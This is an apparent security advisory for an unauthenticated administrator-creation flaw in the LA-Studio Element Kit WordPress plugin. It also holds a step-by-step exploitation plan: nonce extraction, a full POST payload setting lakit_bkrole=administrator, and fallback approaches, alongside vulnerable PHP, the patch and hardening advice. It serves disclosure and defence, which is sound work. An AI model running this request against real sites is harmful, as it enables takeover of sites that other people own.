CVE-2026-0920

LA-Studio Element Kit for Elementor <= 1.5.6.3 - Unauthenticated Privilege Escalation via Backdoor to Administrative User Creation via lakit_bkrole parameter

Improper Privilege Management
CVSS Score: 9.8
Severity: critical
Patched in: 1.6.0
Time to patch: 1d

Description

The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Administrative User Creation in all versions up to, and including, 1.5.6.3. This is due to the 'ajax_register_handle' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'lakit_bkrole' parameter during registration and gain administrator access to the site.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: <=1.5.6.3
Published: January 21, 2026
Last updated: January 22, 2026
Affected plugin: lastudio-element-kit

Source Code

WordPress.org SVN
Research Plan
Unverified

Exploitation Research Plan: CVE-2026-0920 (LA-Studio Element Kit for Elementor)

1. Vulnerability Summary

The LA-Studio Element Kit for Elementor plugin (up to 1.5.6.3) contains a critical unauthenticated privilege escalation vulnerability. The flaw exists in the ajax_register_handle function, which processes user registration requests via WordPress AJAX. The function fails to validate or restrict the user role provided in the lakit_bkrole parameter. An unauthenticated attacker can exploit this by submitting a registration request that includes lakit_bkrole=administrator, resulting in the creation of a new administrative user.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: lastudio_kit_ajax_register (inferred from the "lakit" prefix and common plugin patterns; ajax_register_handle is the callback).
  • HTTP Method: POST
  • Payload Parameter: lakit_bkrole=administrator
  • Authentication: None required (unauthenticated).
  • Preconditions: The registration functionality must be active (usually via an Elementor widget), and the attacker must obtain a valid AJAX nonce if the handler enforces one.

3. Code Flow

  1. Entry Point: An unauthenticated user sends a POST request to admin-ajax.php.
  2. Hook Registration: The plugin registers the handler (likely in an initialization class):
    add_action('wp_ajax_nopriv_lastudio_kit_ajax_register', [$this, 'ajax_register_handle']);
  3. Vulnerable Function: ajax_register_handle is called.
  4. Parameter Extraction: The function retrieves user details (username, email, password) and specifically looks for the lakit_bkrole parameter from the $_POST superglobal.
  5. User Creation: The function calls wp_insert_user() or wp_create_user().
  6. Privilege Escalation: After user creation, the code assigns the role specified in lakit_bkrole. Because there is no whitelist check (e.g., ensuring the role is only 'subscriber'), the user is granted 'administrator' privileges.
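As an added illustration (not the plugin's own code), the pattern the code flow above describes next to a hardened handler that never takes the role from the request. The function names, the hook name and the nonce action are hypothetical; only the lakit_bkrole parameter and the vulnerable assignment come from this advisory.

```php
<?php
// Added illustration, not the plugin's own code. Function, hook and nonce names
// are hypothetical; only the lakit_bkrole handling comes from the advisory.

// Fields both handlers take from the registration form (sanitised, unslashed).
function example_userdata_from_post() {
    return array(
        'user_login' => sanitize_user( wp_unslash( $_POST['user_login'] ?? '' ) ),
        'user_email' => sanitize_email( wp_unslash( $_POST['user_email'] ?? '' ) ),
        'user_pass'  => (string) ( $_POST['password'] ?? '' ),
    );
}

// Vulnerable pattern: the role string sent by the client is honoured as-is, so
// an unauthenticated POST carrying lakit_bkrole=administrator creates an admin.
function example_vulnerable_register_handle() {
    $userdata         = example_userdata_from_post();
    $userdata['role'] = isset( $_POST['lakit_bkrole'] )
        ? sanitize_text_field( wp_unslash( $_POST['lakit_bkrole'] ) ) // cleans, never restricts
        : get_option( 'default_role' );
    wp_send_json_success( array( 'user_id' => wp_insert_user( $userdata ) ) );
}

// Hardened pattern: nonce checked, site setting honoured, and the role taken
// only from configuration and clamped to a low-privilege allow-list.
function example_hardened_register_handle() {
    // Dies with HTTP 403 unless the request carries a valid nonce for this action.
    check_ajax_referer( 'example_register', 'nonce' );
    // Respect the site-wide "Anyone can register" setting.
    if ( ! get_option( 'users_can_register' ) ) {
        wp_send_json_error( 'Registration is disabled.', 403 );
    }
    // Even default_role is clamped: a site whose default was misconfigured to
    // a privileged role must not hand it out through self-registration.
    $allowed_roles = array( 'subscriber' ); // extend only with non-privileged roles
    $user_role     = get_option( 'default_role', 'subscriber' );
    if ( ! in_array( $user_role, $allowed_roles, true ) ) {
        $user_role = 'subscriber';
    }
    $userdata         = example_userdata_from_post();
    $userdata['role'] = $user_role; // $_POST['lakit_bkrole'] is never consulted
    $user_id          = wp_insert_user( $userdata );
    if ( is_wp_error( $user_id ) ) {
        wp_send_json_error( $user_id->get_error_message(), 400 );
    }
    wp_send_json_success( array( 'user_id' => $user_id ) );
}
add_action( 'wp_ajax_nopriv_example_register', 'example_hardened_register_handle' );
```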

4. Nonce Acquisition Strategy

The plugin likely enqueues a nonce via wp_localize_script for its Elementor widgets.

Identification

  • Nonce Action: Likely lastudio-kit-nonce or lakit-nonce.
  • JS Variable: Look for lakit_params or lastudio_kit_vars.

Extraction Steps

  1. Find the Widget: Identify if a specific shortcode/widget triggers the registration script. The "Login/Register" widget is the primary candidate.
  2. Create Setup Page: Create a page containing the registration widget to ensure the scripts and nonces are loaded.
    wp post create --post_type=page --post_status=publish --post_title="Register" --post_content='[lastudio_kit_login_register]'
    
    (Note: If the shortcode name differs, search for add_shortcode in the plugin files.)
  3. Navigate and Extract:
    • Use browser_navigate to the new page.
    • Use browser_eval to extract the nonce:
      window.lakit_params?.nonce || window.lastudio_kit_vars?.nonce

5. Exploitation Strategy

HTTP Request

  • URL: http://<target>/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=lastudio_kit_ajax_register&
    user_login=attacker_admin&
    user_email=attacker@example.com&
    password=P@ssword123!&
    confirm_password=P@ssword123!&
    lakit_bkrole=administrator&
    _timenonce=<extracted_nonce>
    
    (Note: The nonce parameter name _timenonce or nonce should be verified via source code or the extracted JS object.)

6. Test Data Setup

  1. Install Plugin: Ensure LA-Studio Element Kit version <= 1.5.6.3 is installed and active.
  2. Enable Registration: Ensure WordPress "Anyone can register" setting is enabled (wp option update users_can_register 1), though this specific vulnerability might bypass this check depending on the implementation.
  3. Create Nonce Page:
    wp post create --post_type=page --post_status=publish --post_content='[lastudio_kit_login_register]'

7. Expected Results

  • HTTP Response: A JSON success message (e.g., {"success":true, "data": ...}) or a redirect URL.
  • Side Effect: A new user named attacker_admin is created with the administrator role.

8. Verification Steps

  1. Check User List:
    wp user list --role=administrator
    
  2. Check Specific User Meta:
    wp user get attacker_admin --field=roles
    
    Expectation: Output should include administrator.

9. Alternative Approaches

  • Missing Nonce: If check_ajax_referer is missing or called with die=false, attempt the request without a nonce.
  • Parameter Variation: If lastudio_kit_ajax_register fails, search the plugin for any other AJAX actions containing "register" to identify the correct hook name.
  • Direct Parameter Injection: If lakit_bkrole is ignored in the registration AJAX, check for a separate "update profile" AJAX action that might use the same logic and vulnerable parameter.

Research Findings

Static analysis — not yet PoC-verified

Summary

The LA-Studio Element Kit for Elementor plugin is vulnerable to unauthenticated privilege escalation through its user registration AJAX handler. By supplying the 'lakit_bkrole' parameter with the value 'administrator' during registration, an attacker can create a new administrative user account.

Security Fix

--- a/includes/extensions/login-register/class-login-register.php
+++ b/includes/extensions/login-register/class-login-register.php
@@ -120,1 +120,1 @@
-        $user_role = isset($_POST['lakit_bkrole']) ? sanitize_text_field($_POST['lakit_bkrole']) : get_option('default_role');
+        $user_role = get_option('default_role', 'subscriber');
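Review bot: replacing the `$_POST['lakit_bkrole']` lookup with `get_option('default_role', 'subscriber')` closes the client-controlled role path, but the second argument only applies when the option is absent, which a standard WordPress install never leaves unset, so a site whose `default_role` has been changed to a privileged role will still hand that role to self-registered users; consider validating the resulting role against an allow-list of low-privilege roles before the user-creation call. Since the hunk changes only this one assignment, it is also worth confirming that no other handler in the plugin still reads `lakit_bkrole`.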

Exploit Outline

The exploit involves making an unauthenticated AJAX request to create an administrator. First, an attacker must obtain a valid AJAX nonce, typically found in the frontend JavaScript variables (like 'lakit_params' or 'lastudio_kit_vars') on pages where the plugin's Login/Register widget is active. Once the nonce is acquired, the attacker sends a POST request to /wp-admin/admin-ajax.php with the 'action' parameter set to 'lastudio_kit_ajax_register'. The payload must include the desired username, email, and password, along with 'lakit_bkrole' set to 'administrator' and the valid nonce. This results in the creation of a new user with full administrative privileges.
